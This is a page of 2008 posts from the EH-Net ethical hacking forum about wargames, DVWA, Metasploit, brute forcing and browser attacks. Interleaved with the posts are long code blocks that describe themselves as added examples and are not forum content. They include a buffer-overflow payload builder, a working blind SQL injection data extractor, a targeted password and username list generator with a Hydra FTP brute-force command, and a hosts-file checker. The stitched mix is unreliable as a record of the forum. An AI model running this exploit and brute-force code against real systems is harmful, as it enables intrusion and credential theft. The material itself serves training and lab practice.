EH-Net
May 16, 2012, 12:30:41 PM
Show Posts
Pages: 1 ... 5 6 [7] 8 9 10
91  Ethical Hacking Discussions and Related Certifications / Forensics / Re: Any good network based solutions for blog monitoring? on: January 10, 2009, 06:25:55 PM
You could always write some snort rules that log posts to the sites you are most interested in monitoring.  You would probably get way more than you wanted,  but that would certainly be a possibility.
92  Ethical Hacking Discussions and Related Certifications / Other / Re: What kind of lab, machines you have for your security testing? on: December 30, 2008, 09:09:28 PM
Virtualbox is great with one exception, the networking.  If you are interested in having your own network and putting all of the virtual boxes on the network through NAT, then Virtualbox is cake to setup.  The one beef that I have is that it sucks to have to create individual bridge adapters and then more individual adapters for each box linked with the bridge device.  Then if you want DHCP on a host only network, you need to set that up yourself.  In comparison to VMware, virtualbox needs to fix that.  As far as speed, I think Virtualbox is much faster and seems to have a smaller memory footprint.  For my linux boxes, I use virtualbox as my VM architecture since the hardware support seems great.

As far as lab boxes,  I have 2 linux boxes, one a quad core 4g ram and one a dual core with 2g of ram that I use.  I use ESX server on them and have a host only network on each with a small linux box I use as a gateway server and allow or disallow bridging when I need it to bridge the host only network to the real world for software downloads etc.  I have a number of other boxes that I use in bridged mode to do testing with.  This setup is nice in that there are some boxes that I really REALLY don't want on the network, such as XP sp0 boxes, and others which require network access. 
93  Features / Dec 08 - Santa Claus Is Hacking to Town / Re: [Article]-Santa Claus is Hacking to Town on: December 30, 2008, 11:14:39 AM
I completely agree, these challenges are great and are always a fun thinking exercise. Whether you win the challenge or not, it's always fun to try to figure out how to solve these problems, and then to see how others solved it when the challenge is done. 
94  Resources / Links to cool sites. / www.smashthestack.org hacking wargame server on: December 28, 2008, 10:52:31 PM
Starting mid-last year, I've been working on learning more about exploits, and in the process I found a neat site I wanted to tell folks about.  http://www.smashthestack.org has a number of different wargame servers.  The wargame servers host a progression of challenges where each challenge is dependent on the completion of the previous challenge. 

The challenges are *nix based, and range from very entry level to fairly complex.  The machines aren't truly a real world experience, as many of the features which protect servers from buffer and heap overflows in modern operating systems have been disabled, so if you are just learning about exploit creation then this is a great site.  In many of the challenges, the source code is provided, so in most challenges it should be fairly straightforward why the application is vulnerable.  Once you've figured out how to exploit the application and complete the challenge, there's the opportunity to add your name to "the wall", a web page for each level where folks can append their pseudonym or tag in order to let everyone else know they have completed the challenge.

In most cases, getting started is as simple as  sshing into one of the wargame servers.  From there, you should be presented with a message letting you know how to get started.  Many of the traditional tools needed to discover and create exploits are already present on the box, so you shouldn't need anything extra to get started.  All of the action happens on the servers. With the exception of potentially looking up shellcode through a tool like metasploit, a little bit of Google searching should be all that is required.

There is also a forum where questions can be asked, but unfortunately it isn't very active. There is an IRC channel for each server and a general social channel.  If you aren't familiar with IRC, there is a web based version linked off the front page of the site. 

If you need additional help with these challenges there are 2 books which served me well, and I used metasploit to generate the shellcode for the exploits.  The two books were "Hacking: The Art of Exploitation 2nd Edition", which I recently reviewed at http://www.ethicalhacker.net/content/view/224/2/,  and "The Shellcoder's Handbook".  I primarily used HTAoE, however for format string exploits, I used Shellcoder's Handbook as the explanation seemed to make more sense.

The challenges on this site should help solidify your understanding of some types of exploits as well as point out areas that require more work.  If you are interested in how exploits work and exploit development, then I recommend visiting the site and trying your hand at the challenges.  If nothing else, you should have a basic idea of where you stand, and you will probably have fun along the way.   
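The post describes the usual way a wargame level is solved: measure the distance to the saved return address, pick an address inside a NOP sled, and feed the program a buffer with shellcode generated by Metasploit. The following payload builder is an added example, not code from the post or from smashthestack. The offset, the return address and the `int3` placeholder shellcode are all hypothetical values standing in for what you would measure with a debugger on a given level; a 32-bit little-endian x86 target with stack protections disabled (as the post notes the servers are) is assumed.

```python
import struct
import sys

# Constructed, hypothetical values: measure the real ones on the level with
# a debugger. They are not taken from any smashthestack challenge.
BUFFER_OFFSET = 76        # bytes from start of buffer to the saved return address
RET_ADDR = 0xbffff5c0     # hypothetical stack address that lands inside the NOP sled
# Placeholder shellcode: int3 breakpoints standing in for real shellcode,
# which the post generates with Metasploit (msfpayload).
SHELLCODE = b"\xcc" * 23

# Bytes the typical vulnerable input routine stops on: NUL ends a strcpy(),
# a newline ends a gets()/fgets() read. A single one truncates the overflow.
BAD_CHARS = b"\x00\x0a"


def find_bad_chars(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return the offsets of every byte the target would stop reading at."""
    return [i for i, b in enumerate(payload) if b in bad]


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  sled: int = 32, repeats: int = 4) -> bytes:
    """NOP sled + shellcode, padded up to `offset`, then the return address
    packed little-endian and repeated so that a slightly mis-measured offset
    still overwrites the saved EIP with it."""
    body = b"\x90" * sled + shellcode
    if len(body) > offset:
        raise ValueError("sled + shellcode (%d bytes) exceeds offset (%d)"
                         % (len(body), offset))
    body += b"A" * (offset - len(body))
    ret = struct.pack("<I", ret_addr)      # "<I": 32-bit little-endian
    return body + ret * repeats


def sled_window(ret_addr: int, buffer_addr: int, sled: int) -> bool:
    """True if ret_addr points somewhere inside the sled that starts at
    buffer_addr, i.e. execution will slide into the shellcode."""
    return buffer_addr <= ret_addr < buffer_addr + sled


if __name__ == "__main__":
    payload = build_payload(BUFFER_OFFSET, RET_ADDR, SHELLCODE)
    bad = find_bad_chars(payload)
    if bad:
        sys.exit("payload contains bad chars at offsets %r" % bad)
    # Write raw bytes so they can be piped into the level binary.
    sys.stdout.buffer.write(payload)
```

Run it as `python3 exploit.py | ./level` (or save the output to a file and pass it as an argument, depending on how the level reads its input). The bad-character check is the one people forget: a return address such as 0x0804a000 contains a NUL byte, which silently truncates a `strcpy()`-based overflow.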
95  Ethical Hacking Discussions and Related Certifications / General Certification / Re: An announcement and a question about training on: December 17, 2008, 10:41:45 PM
A discussion of looking beyond the vulnerabilities to the business processes which allowed them to be exposed may be a positive point as well.  While it's easy to point out all the stuff that's busted, coming up with a strategic plan that will keep an environment secure way longer than the next patch Tuesday would be great.  In many of the reports that I've seen, the strategic recommendations seem to be lacking.

Another one that I haven't seen much done with is evaluating network configuration.  For instance, layer 2 attacks are still effective without countermeasures in place, so a discussion of arp poisoning, and a discussion of why those protections are important might be nice.  MITM seems to be discussed a lot recently with tools like squirtle, Cain and Abel, beef, and middler, etc.

Sounds like a neat class.  With your skills in social engineering, I hope that makes a showing as well :)
96  Resources / Tools / Re: My new tool (DVWA) on: December 16, 2008, 08:55:17 PM
This is a neat set of very straightforward exploitable pages.  I have 3 suggestions.  The first one is that your HTML is formatted very nicely in most places, if you formatted your code nicely too then it would be easier to read and to a certain extent understand what is going on with the application.

The second suggestion is since you included something on brutus, include something on .htpasswd files and using john or cain to crack them. Maybe make it something to do with a combination of an LFI. 

Another one might be to create a blind sql injection and suggest a tool like sqlbrute to map out table structure and eventually get the data. 

This is a really nice basic set of test applications to try out these types of vulnerabilities.  Thanks for putting all of these together :)
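The third suggestion above (a blind SQL injection page plus a tool that maps the table structure out of it) is worth seeing end to end. The code below is an added example and is not part of DVWA or of the post: it builds a hypothetical DVWA-style lookup page on an in-memory SQLite database (table and rows constructed for the example), then recovers the schema and a password from nothing but the page's yes/no answer, the way sqlbrute and similar tools do, and shows the parameterised query that closes the hole.

```python
import sqlite3

# Constructed target: an in-memory SQLite database stands in for the
# application's backend. The table and rows are made up for this example.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
INSERT INTO users VALUES (2, 'bob', 'hunter2');
""")


def vulnerable_lookup(user_id: str) -> bool:
    """Hypothetical blind-injection page: user input is concatenated into
    the query, but the page only reveals whether a row came back."""
    sql = "SELECT id FROM users WHERE id = " + user_id   # injection point
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(user_id: str) -> bool:
    """Fixed version: the input is bound as a parameter, so it is only ever
    compared as a value and never parsed as SQL."""
    row = _db.execute("SELECT id FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def oracle(condition: str) -> bool:
    """Ask the page one yes/no question by AND-ing a boolean clause onto a
    known-good id. True means 'row returned', i.e. the condition held."""
    return vulnerable_lookup("1 AND (" + condition + ")")


def extract_string(expr: str, max_len: int = 64) -> str:
    """Recover the value of an SQL expression one character at a time with a
    binary search on UNICODE(SUBSTR(expr, pos, 1)): 7 oracle calls per
    character instead of up to 127 equality guesses."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("UNICODE(SUBSTR((%s), %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # SUBSTR past the end yields '' (UNICODE -> NULL), every
            # comparison fails and the search bottoms out at 0: end of string.
            break
        out += chr(lo)
    return out


def map_tables(max_tables: int = 16) -> list:
    """Walk sqlite_master with LIMIT 1 OFFSET n to list the table names."""
    names = []
    for n in range(max_tables):
        name = extract_string(
            "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET %d" % n)
        if not name:
            break
        names.append(name)
    return names


if __name__ == "__main__":
    print("tables:", map_tables())
    print("admin password:", extract_string("SELECT password FROM users WHERE name='admin'"))
    print("same injection against the fixed page:", safe_lookup("1 AND (1=1)"))
```

On a real MySQL backend the schema walk would read `information_schema.tables` and use `ORD(SUBSTRING(...))` instead, but the oracle-plus-binary-search loop is identical, which is why a blind page that leaks a single bit per request is still a full data disclosure.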

97  Ethical Hacking Discussions and Related Certifications / Malware / Re: Microsoft Sees 'Huge Increase' in IE Attacks on: December 16, 2008, 03:31:10 PM
http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx

Microsoft has said that they will release the patch tomorrow.  I haven't seen it yet in my organization, but doing some testing I noticed that IE will crash with Symantec popping up an alert before I can get my stage 2 downloaded and installed.   I did take some of the sample URLs and look at the payloads that it was pushing down, it reminded me to take a look-see at my hosts file as both the payloads I saw included adding DNS entries. 
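
The hosts-file "look-see" mentioned above is a check worth scripting, since a payload that adds DNS entries typically either points a security vendor's update host at 127.0.0.1 or points a site the user trusts at an attacker-controlled address. The checker below is an added example, not code from the post or from any of the samples it refers to; the hosts file content and the watchlist of domains are constructed for the example, and on a real machine you would point it at `C:\Windows\System32\drivers\etc\hosts` or `/etc/hosts`.

```python
import ipaddress
import os

# Constructed sample hosts file. The poisoned lines mimic the behaviour the
# post describes (payloads adding DNS entries); they are not real samples.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net          # blocklist style, harmless
127.0.0.1       update.symantec.com      # security vendor sinkholed
192.0.2.44      www.bank.example         # redirected to another host
not-an-ip       broken.example
"""

# Hypothetical watchlist: hosts that should never be sinkholed on a client.
WATCHLIST_SUFFIXES = ("symantec.com", "microsoft.com",
                      "windowsupdate.com", "bank.example")


def parse_hosts(text):
    """Yield (ip, hostname) pairs; comments and blank lines are skipped and
    one line may map several names to the same address."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        for name in parts[1:]:
            yield parts[0], name.lower()


def classify(ip, name):
    """Return None for a benign entry or a verdict string for a suspect one."""
    if "localhost" in name:
        return None
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return "malformed"          # not an address at all: worth a look
    if not (addr.is_loopback or addr.is_unspecified):
        return "redirect"           # a name is being sent somewhere specific
    if name.endswith(WATCHLIST_SUFFIXES):
        return "sinkhole"           # vendor/update host blackholed locally
    return None


def suspicious_entries(text):
    """All entries that merit review, in file order."""
    findings = []
    for ip, name in parse_hosts(text):
        verdict = classify(ip, name)
        if verdict:
            findings.append((verdict, ip, name))
    return findings


if __name__ == "__main__":
    path = (r"C:\Windows\System32\drivers\etc\hosts" if os.name == "nt"
            else "/etc/hosts")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for verdict, ip, name in suspicious_entries(fh.read()):
            print("%-9s %-16s %s" % (verdict, ip, name))
```

Any "redirect" finding is not automatically malicious (administrators do pin internal names this way), so the output is a review list rather than a verdict; the "sinkhole" class, a security vendor's host pointed at loopback, is the one that matches what the post saw.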
98  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Word list for FTP brute force on: December 11, 2008, 10:24:04 PM
A pretty good tool for doing brute forcing is THC Hydra.  Your password list should probably be a combination of dictionary words and commonly used passwords (whether you can use ones from other engagements may or may not be allowed based on your previous work arrangements); another method to get good passwords is to mine for keywords off of the company's website.  Getting usernames can be done the same way, potentially looking through metadata to find usernames and ideas for passwords.  Check out metagoofil for metadata extraction.  There have been a few articles out there on this, most notably by Chris Gates and a post on pauldotcom.com by Larry. 
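
The list-building part of that advice, as an added example that is not code from the post or from Hydra: take the company's own words, mangle them the way users do, add the usual common passwords, and derive username formats from names found in documents or metadata. The sample site text and the two names are constructed for the example; a real run would feed in scraped page text and whatever metagoofil pulled out of the company's documents.

```python
import re

# Constructed sample of text scraped from a hypothetical target's website.
SAMPLE_SITE_TEXT = """
Welcome to Acme Widgets, makers of the Thunderbolt and Zephyr product lines
since 1987. Our headquarters are in Springfield. Contact: Jane Doe (CEO),
Robert Smith (IT Manager).
"""
# Constructed names, as they would come out of document metadata.
SAMPLE_NAMES = ["Jane Doe", "Robert Smith"]

# Words that are company-specific are the point; generic ones are dropped.
STOPWORDS = {"welcome", "makers", "product", "lines", "since",
             "headquarters", "contact", "manager"}
COMMON_PASSWORDS = ["password", "123456", "letmein", "welcome1", "qwerty"]
SUFFIXES = ["", "1", "123", "!", "2008", "2009"]
LEET = str.maketrans("aeio", "4310")


def site_keywords(text, min_len=4):
    """Distinct lower-cased words of at least min_len letters, in order of
    first appearance, minus stopwords."""
    out = []
    for word in re.findall(r"[A-Za-z]{%d,}" % min_len, text):
        lw = word.lower()
        if lw not in STOPWORDS and lw not in out:
            out.append(lw)
    return out


def mangle(word):
    """Case and leet variants of a word with common suffixes appended."""
    bases = [word, word.capitalize(), word.upper(), word.translate(LEET)]
    out = []
    for base in bases:
        for suffix in SUFFIXES:
            cand = base + suffix
            if cand not in out:
                out.append(cand)
    return out


def username_candidates(full_names):
    """The username formats most organisations pick from."""
    out = []
    for full in full_names:
        parts = full.lower().split()
        first, last = parts[0], parts[-1]
        for user in (first + "." + last, first[0] + last, first + last[0],
                     first + "_" + last, last + first[0]):
            if user not in out:
                out.append(user)
    return out


def build_password_list(text, full_names):
    """Common passwords first (cheapest hits), then mangled site keywords
    and surnames. Order matters: Hydra tries the list top to bottom."""
    words = list(COMMON_PASSWORDS)
    seeds = site_keywords(text) + [n.split()[-1].lower() for n in full_names]
    for seed in seeds:
        for cand in mangle(seed):
            if cand not in words:
                words.append(cand)
    return words


if __name__ == "__main__":
    with open("users.txt", "w") as fh:
        fh.write("\n".join(username_candidates(SAMPLE_NAMES)) + "\n")
    with open("passwords.txt", "w") as fh:
        fh.write("\n".join(build_password_list(SAMPLE_SITE_TEXT, SAMPLE_NAMES)) + "\n")
```

The two files feed straight into Hydra as `hydra -L users.txt -P passwords.txt ftp://192.0.2.10`. Keep the list short and ordered by likelihood: against a lockout policy you get a handful of guesses per account, so the company's product names with a year appended are worth more than a 10 MB dictionary.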
99  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Metasploit: forward/backward porting on: December 04, 2008, 11:18:29 AM
I would say it depends on the size and complexity of the exploit.  If it is an extremely complex module, I'd backport shellcode from msf3, if it is a pretty simple one I'd port the exploit, or if you think you are going to use this exploit again in the future I'd port to msf3 since the options for things you can do seem to keep getting larger under the msf3 platform.

Also, in theory, you could hardcode your payload into the exploit with the perl output from msfpayload and then just use the handler capabilities of the module that you borrowed from msf3 with the closest things that match in the msf2 framework. 
100  EH-Net / Special Events / Re: Pen Testing Perfect Storm Webcast Series: Part 2 - Teaser on: November 24, 2008, 09:13:16 PM
The previous version can be found here :
http://w.on24.com/r.htm?e=121680&s=1&k=A0A9EE250B2691348F1218E5F1B16CEA

If you haven't previously registered you may have to register. 
101  Ethical Hacking Discussions and Related Certifications / Programming / Re: Using Assembly to access locked files on: November 21, 2008, 07:56:29 PM
So.. I'm not a windows kernel hacker, but here is some speculation.  My guess would be that the ideal way to get to the things that you want is not assembly, but instead dll injection.  If you want to delete locked files, process explorer can probably help you.  If you want to scrape program memory, a debugger or such can be your best friend.  So I guess the real question is, what is your goal?  A file handle is basically just a view into the file that the operating system helps you keep track of so that you aren't doing a lot of other work that the operating system is already doing for you.  Files aren't always in one place on the disk, so the file handle makes sure you don't have to deal with that.  If you are trying to do something specific with these files, elaborate a little more and there may be some tools out there that will help you do what you'd like without writing any code.

102  Resources / Tools / Metasploit 3.2 released on: November 19, 2008, 01:56:42 PM
A release announcement went out for Metasploit 3.2 today.  You can read the announcement here:
http://www.metasploit.com/documents/RELEASE-3.2.txt

Some of the new awesomeness includes:
Pass The Hash capabilities
Better Karmetasploit support
IPv6 support
PHP Payloads
and much more...

You can get the new hotness either via svn or by going to:
http://www.metasploit.com/framework/download/

and downloading the newest version.


103  Features / Book Reviews / Re: The Art Of Exploitation on: November 18, 2008, 07:02:04 PM
I'm actually working on a review of it now.  This is a great book for getting the bases down for understanding how exploits work and how to write them.  This is sort of the primer for understanding many of the most common exploits out there today.  It is heavily unix centric, but in my opinion that makes it easier to understand.  I didn't find the examples horribly useful though, and I actually tested what I learned over at http://www.smashthestack.org/ and referenced back to this book and Shellcoder's Handbook on a regular basis as I went through the exercises.

104  Resources / Tutorials / Re: problem with use MSF on: November 17, 2008, 05:06:25 PM
I'll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus.  There is another option for you to google which is db_autopwn.  If you search for that, and you use backtrack3 things will get easier for you.  If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate.  If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.

105  Resources / Tutorials / Re: problem with use MSF on: November 16, 2008, 10:47:54 PM
You probably aren't vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
© 2012 The Ethical Hacker Network